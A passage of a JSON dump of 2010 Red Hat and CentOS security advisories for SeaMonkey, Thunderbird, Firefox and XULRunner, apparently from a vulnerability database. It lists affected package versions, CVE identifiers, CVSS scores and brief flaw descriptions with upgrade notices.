"OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "s390", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-52.el4_8.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "s390", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-52.el4_8.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "s390", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-52.el4_8.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "s390", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-52.el4_8.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "s390", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-52.el4_8.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "s390x", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-52.el4_8.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "s390x", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-52.el4_8.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "s390x", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-52.el4_8.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "s390x", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-52.el4_8.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "s390x", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-52.el4_8.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "s390x", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-52.el4_8.s390x.rpm", "operator": "lt"}], "description": "SeaMonkey is an open source Web browser, email and newsgroup client, IRC\nchat client, and HTML editor.\n\nA use-after-free flaw was found in SeaMonkey. Under low memory conditions,\nvisiting a web page containing malicious content could result in SeaMonkey\nexecuting arbitrary code with the privileges of the user running SeaMonkey.\n(CVE-2009-1571)\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause SeaMonkey to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nSeaMonkey. (CVE-2010-0159)\n\nAll SeaMonkey users should upgrade to these updated packages, which correct\nthese issues. After installing the update, SeaMonkey must be restarted for\nthe changes to take effect.", "reporter": "RedHat", "published": "2010-02-17T05:00:00", "type": "redhat", "title": "(RHSA-2010:0113) Critical: seamonkey security update", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0169", "CVE-2010-0171"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-05-26T04:26:17", "id": "RHSA-2010:0113", "href": "https://access.redhat.com/errata/RHSA-2010:0113", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-09T07:19:28", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.0.0.24-2.el5_4", "packageName": "thunderbird", "packageFilename": "thunderbird-2.0.0.24-2.el5_4.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.0.0.24-2.el5_4", "packageName": "thunderbird", "packageFilename": "thunderbird-2.0.0.24-2.el5_4.src.rpm", "arch": "src", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.0.0.24-2.el5_4", "packageName": "thunderbird", "packageFilename": "thunderbird-2.0.0.24-2.el5_4.x86_64.rpm", "arch": "x86_64", "operator": "lt"}], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed HTML mail content.\nAn HTML mail message containing malicious content could cause Thunderbird\nto crash or, potentially, execute arbitrary code with the privileges of the\nuser running Thunderbird. (CVE-2009-2462, CVE-2009-2463, CVE-2009-2466,\nCVE-2009-3072, CVE-2009-3075, CVE-2009-3380, CVE-2009-3979, CVE-2010-0159)\n\nA use-after-free flaw was found in Thunderbird. An attacker could use this\nflaw to crash Thunderbird or, potentially, execute arbitrary code with the\nprivileges of the user running Thunderbird. (CVE-2009-3077)\n\nA heap-based buffer overflow flaw was found in the Thunderbird string to\nfloating point conversion routines. An HTML mail message containing\nmalicious JavaScript could crash Thunderbird or, potentially, execute\narbitrary code with the privileges of the user running Thunderbird.\n(CVE-2009-0689)\n\nA use-after-free flaw was found in Thunderbird. Under low memory\nconditions, viewing an HTML mail message containing malicious content could\nresult in Thunderbird executing arbitrary code with the privileges of the\nuser running Thunderbird. (CVE-2009-1571)\n\nA flaw was found in the way Thunderbird created temporary file names for\ndownloaded files. If a local attacker knows the name of a file Thunderbird\nis going to download, they can replace the contents of that file with\narbitrary contents. (CVE-2009-3274)\n\nA flaw was found in the way Thunderbird displayed a right-to-left override\ncharacter when downloading a file. In these cases, the name displayed in\nthe title bar differed from the name displayed in the dialog body. An\nattacker could use this flaw to trick a user into downloading a file that\nhas a file name or extension that is different from what the user expected.\n(CVE-2009-3376)\n\nA flaw was found in the way Thunderbird processed SOCKS5 proxy replies. A\nmalicious SOCKS5 server could send a specially-crafted reply that would\ncause Thunderbird to crash. (CVE-2009-2470)\n\nDescriptions in the dialogs when adding and removing PKCS #11 modules were\nnot informative. An attacker able to trick a user into installing a\nmalicious PKCS #11 module could use this flaw to install their own\nCertificate Authority certificates on a user's machine, making it possible\nto trick the user into believing they are viewing trusted content or,\npotentially, execute arbitrary code with the privileges of the user running\nThunderbird. (CVE-2009-3076)\n\nAll Thunderbird users should upgrade to this updated package, which\nresolves these issues. All running instances of Thunderbird must be\nrestarted for the update to take effect.", "reporter": "RedHat", "published": "2010-03-17T04:00:00", "type": "redhat", "title": "(RHSA-2010:0153) Moderate: thunderbird security update", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-0689", "CVE-2009-1571", "CVE-2009-2462", "CVE-2009-2463", "CVE-2009-2466", "CVE-2009-2470", "CVE-2009-3072", "CVE-2009-3075", "CVE-2009-3076", "CVE-2009-3077", "CVE-2009-3274", "CVE-2009-3376", "CVE-2009-3380", "CVE-2009-3384", "CVE-2009-3979", "CVE-2010-0159", "CVE-2010-0163", "CVE-2010-0169", "CVE-2010-0171"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T11:54:16", "id": "RHSA-2010:0153", "href": "https://access.redhat.com/errata/RHSA-2010:0153", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-09T07:19:47", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-25.el4", "packageName": "thunderbird", "packageFilename": "thunderbird-1.5.0.12-25.el4.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-25.el4", "packageName": "thunderbird", "packageFilename": "thunderbird-1.5.0.12-25.el4.src.rpm", "arch": "src", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-25.el4", "packageName": "thunderbird", "packageFilename": "thunderbird-1.5.0.12-25.el4.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-25.el4", "packageName": "thunderbird", "packageFilename": "thunderbird-1.5.0.12-25.el4.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-25.el4", "packageName": "thunderbird", "packageFilename": "thunderbird-1.5.0.12-25.el4.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-25.el4", "packageName": "thunderbird", "packageFilename": "thunderbird-1.5.0.12-25.el4.s390.rpm", "arch": "s390", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-25.el4", "packageName": "thunderbird", "packageFilename": "thunderbird-1.5.0.12-25.el4.s390x.rpm", "arch": "s390x", "operator": "lt"}], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed HTML mail content.\nAn HTML mail message containing malicious content could cause Thunderbird\nto crash or, potentially, execute arbitrary code with the privileges of the\nuser running Thunderbird. (CVE-2009-2462, CVE-2009-2463, CVE-2009-2466,\nCVE-2009-3072, CVE-2009-3075, CVE-2009-3380, CVE-2009-3979, CVE-2010-0159)\n\nA use-after-free flaw was found in Thunderbird. An attacker could use this\nflaw to crash Thunderbird or, potentially, execute arbitrary code with the\nprivileges of the user running Thunderbird. (CVE-2009-3077)\n\nA heap-based buffer overflow flaw was found in the Thunderbird string to\nfloating point conversion routines. An HTML mail message containing\nmalicious JavaScript could crash Thunderbird or, potentially, execute\narbitrary code with the privileges of the user running Thunderbird.\n(CVE-2009-0689)\n\nA use-after-free flaw was found in Thunderbird. Under low memory\nconditions, viewing an HTML mail message containing malicious content could\nresult in Thunderbird executing arbitrary code with the privileges of the\nuser running Thunderbird. (CVE-2009-1571)\n\nA flaw was found in the way Thunderbird created temporary file names for\ndownloaded files. If a local attacker knows the name of a file Thunderbird\nis going to download, they can replace the contents of that file with\narbitrary contents. (CVE-2009-3274)\n\nA flaw was found in the way Thunderbird displayed a right-to-left override\ncharacter when downloading a file. In these cases, the name displayed in\nthe title bar differed from the name displayed in the dialog body. An\nattacker could use this flaw to trick a user into downloading a file that\nhas a file name or extension that is different from what the user expected.\n(CVE-2009-3376)\n\nA flaw was found in the way Thunderbird processed SOCKS5 proxy replies. A\nmalicious SOCKS5 server could send a specially-crafted reply that would\ncause Thunderbird to crash. (CVE-2009-2470)\n\nDescriptions in the dialogs when adding and removing PKCS #11 modules were\nnot informative. An attacker able to trick a user into installing a\nmalicious PKCS #11 module could use this flaw to install their own\nCertificate Authority certificates on a user's machine, making it possible\nto trick the user into believing they are viewing trusted content or,\npotentially, execute arbitrary code with the privileges of the user running\nThunderbird. (CVE-2009-3076)\n\nAll Thunderbird users should upgrade to this updated package, which\nresolves these issues. All running instances of Thunderbird must be\nrestarted for the update to take effect.", "reporter": "RedHat", "published": "2010-03-17T04:00:00", "type": "redhat", "title": "(RHSA-2010:0154) Moderate: thunderbird security update", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-0689", "CVE-2009-1571", "CVE-2009-2462", "CVE-2009-2463", "CVE-2009-2466", "CVE-2009-2470", "CVE-2009-3072", "CVE-2009-3075", "CVE-2009-3076", "CVE-2009-3077", "CVE-2009-3274", "CVE-2009-3376", "CVE-2009-3380", "CVE-2009-3384", "CVE-2009-3979", "CVE-2010-0159", "CVE-2010-0163", "CVE-2010-0169", "CVE-2010-0171"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:12:36", "id": "RHSA-2010:0154", "href": "https://access.redhat.com/errata/RHSA-2010:0154", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-03T18:24:38", "references": ["https://rhn.redhat.com/errata/RHSA-2010-0112.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "i386", "packageName": "xulrunner-devel", "packageFilename": "xulrunner-devel-1.9.0.18-1.el5_4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "i386", "packageName": "xulrunner-devel", "packageFilename": "xulrunner-devel-1.9.0.18-1.el5_4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "x86_64", "packageName": "xulrunner-devel", "packageFilename": "xulrunner-devel-1.9.0.18-1.el5_4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.0.18-1.el4.centos", "arch": "x86_64", "packageName": "firefox", "packageFilename": "firefox-3.0.18-1.el4.centos.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.0.18-1.el5.centos", "arch": "any", "packageName": "firefox", "packageFilename": "firefox-3.0.18-1.el5.centos.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.0.18-1.el5.centos", "arch": "any", "packageName": "firefox", "packageFilename": "firefox-3.0.18-1.el5.centos.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.0.18-1.el4.centos", "arch": "i386", "packageName": "firefox", "packageFilename": "firefox-3.0.18-1.el4.centos.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "i386", "packageName": "xulrunner-devel-unstable", "packageFilename": "xulrunner-devel-unstable-1.9.0.18-1.el5_4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.0.18-1.el5.centos", "arch": "i386", "packageName": "firefox", "packageFilename": "firefox-3.0.18-1.el5.centos.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.0.18-1.el5.centos", "arch": "i386", "packageName": "firefox", "packageFilename": "firefox-3.0.18-1.el5.centos.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.0.18-1.el4.centos", "arch": "any", "packageName": "firefox", "packageFilename": "firefox-3.0.18-1.el4.centos.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.0.18-1.el4.centos", "arch": "any", "packageName": "firefox", "packageFilename": "firefox-3.0.18-1.el4.centos.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "x86_64", "packageName": "xulrunner", "packageFilename": "xulrunner-1.9.0.18-1.el5_4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.0.18-1.el5.centos", "arch": "x86_64", "packageName": "firefox", "packageFilename": "firefox-3.0.18-1.el5.centos.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "x86_64", "packageName": "xulrunner-devel-unstable", "packageFilename": "xulrunner-devel-unstable-1.9.0.18-1.el5_4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "i386", "packageName": "xulrunner", "packageFilename": "xulrunner-1.9.0.18-1.el5_4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "i386", "packageName": "xulrunner", "packageFilename": "xulrunner-1.9.0.18-1.el5_4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "any", "packageName": "xulrunner", "packageFilename": "xulrunner-1.9.0.18-1.el5_4.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "any", "packageName": "xulrunner", "packageFilename": "xulrunner-1.9.0.18-1.el5_4.src.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0112\n\n\nMozilla Firefox is an open source Web browser. XULRunner provides the XUL\nRuntime environment for Mozilla Firefox.\n\nA use-after-free flaw was found in Firefox. Under low memory conditions,\nvisiting a web page containing malicious content could result in Firefox\nexecuting arbitrary code with the privileges of the user running Firefox.\n(CVE-2009-1571)\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2010-0159, CVE-2010-0160)\n\nTwo flaws were found in the way certain content was processed. An attacker\ncould use these flaws to create a malicious web page that could bypass the\nsame-origin policy, or possibly run untrusted JavaScript. (CVE-2009-3988,\nCVE-2010-0162)\n\nFor technical details regarding these flaws, refer to the Mozilla security\nadvisories for Firefox 3.0.18. You can find a link to the Mozilla\nadvisories in the References section of this errata.\n\nAll Firefox users should upgrade to these updated packages, which contain\nFirefox version 3.0.18, which corrects these issues. After installing the\nupdate, Firefox must be restarted for the changes to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-February/016507.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-February/016508.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-February/016525.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-February/016526.html\n\n**Affected packages:**\nfirefox\nxulrunner\nxulrunner-devel\nxulrunner-devel-unstable\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0112.html", "edition": 1, "reporter": "CentOS Project", "published": "2010-02-18T00:33:18", "title": "firefox, xulrunner security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0167", "CVE-2010-0162", "CVE-2010-0171", "CVE-2009-3988", "CVE-2010-0169"], "modified": "2010-02-23T00:17:39", "href": "http://lists.centos.org/pipermail/centos-announce/2010-February/016507.html", "id": "CESA-2010:0112", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:24:58", "references": ["https://rhn.redhat.com/errata/RHSA-2010-0113.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "i386", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.50.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-52.el4.centos", "arch": "i386", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-52.el4.centos.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "x86_64", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-0.50.el3.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "any", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-0.50.el3.centos3.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "any", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-0.50.el3.centos3.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "i386", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-0.50.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "i386", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-0.50.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-52.el4.centos", "arch": "x86_64", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-52.el4.centos.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "i386", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-0.50.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-52.el4.centos", "arch": "any", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-52.el4.centos.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-52.el4.centos", "arch": "any", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-52.el4.centos.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "x86_64", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-0.50.el3.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-52.el4.centos", "arch": "x86_64", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-52.el4.centos.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-52.el4.centos", "arch": "x86_64", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-52.el4.centos.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "i386", "packageName": "seamonkey-nspr", "packageFilename": "seamonkey-nspr-1.0.9-0.50.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "i386", "packageName": "seamonkey-nspr", "packageFilename": "seamonkey-nspr-1.0.9-0.50.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "x86_64", "packageName": "seamonkey-nspr-devel", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.50.el3.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-52.el4.centos", "arch": "i386", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-52.el4.centos.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-52.el4.centos", "arch": "x86_64", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-52.el4.centos.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "i386", "packageName": "seamonkey-nss-devel", "packageFilename": "seamonkey-nss-devel-1.0.9-0.50.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-52.el4.centos", "arch": "i386", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-52.el4.centos.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-52.el4.centos", "arch": "i386", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-52.el4.centos.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "x86_64", "packageName": "seamonkey-nss", "packageFilename": "seamonkey-nss-1.0.9-0.50.el3.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "i386", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-0.50.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-52.el4.centos", "arch": "x86_64", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-52.el4.centos.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "i386", "packageName": "seamonkey-nss", "packageFilename": "seamonkey-nss-1.0.9-0.50.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "i386", "packageName": "seamonkey-nss", "packageFilename": "seamonkey-nss-1.0.9-0.50.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "x86_64", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.50.el3.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "i386", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-0.50.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-52.el4.centos", "arch": "i386", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-52.el4.centos.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "x86_64", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-0.50.el3.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "i386", "packageName": "seamonkey-nspr-devel", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.50.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-52.el4.centos", "arch": "x86_64", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-52.el4.centos.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-52.el4.centos", "arch": "i386", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-52.el4.centos.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "i386", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-0.50.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "x86_64", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-0.50.el3.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "x86_64", "packageName": "seamonkey-nspr", "packageFilename": "seamonkey-nspr-1.0.9-0.50.el3.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "x86_64", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-0.50.el3.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.50.el3.centos3", "arch": "x86_64", "packageName": "seamonkey-nss-devel", "packageFilename": "seamonkey-nss-devel-1.0.9-0.50.el3.centos3.x86_64.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0113\n\n\nSeaMonkey is an open source Web browser, email and newsgroup client, IRC\nchat client, and HTML editor.\n\nA use-after-free flaw was found in SeaMonkey. Under low memory conditions,\nvisiting a web page containing malicious content could result in SeaMonkey\nexecuting arbitrary code with the privileges of the user running SeaMonkey.\n(CVE-2009-1571)\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause SeaMonkey to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nSeaMonkey. (CVE-2010-0159)\n\nAll SeaMonkey users should upgrade to these updated packages, which correct\nthese issues. After installing the update, SeaMonkey must be restarted for\nthe changes to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-February/016505.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-February/016506.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-February/016509.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-February/016510.html\n\n**Affected packages:**\nseamonkey\nseamonkey-chat\nseamonkey-devel\nseamonkey-dom-inspector\nseamonkey-js-debugger\nseamonkey-mail\nseamonkey-nspr\nseamonkey-nspr-devel\nseamonkey-nss\nseamonkey-nss-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0113.html", "edition": 1, "reporter": "CentOS Project", "published": "2010-02-18T00:29:51", "title": "seamonkey security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 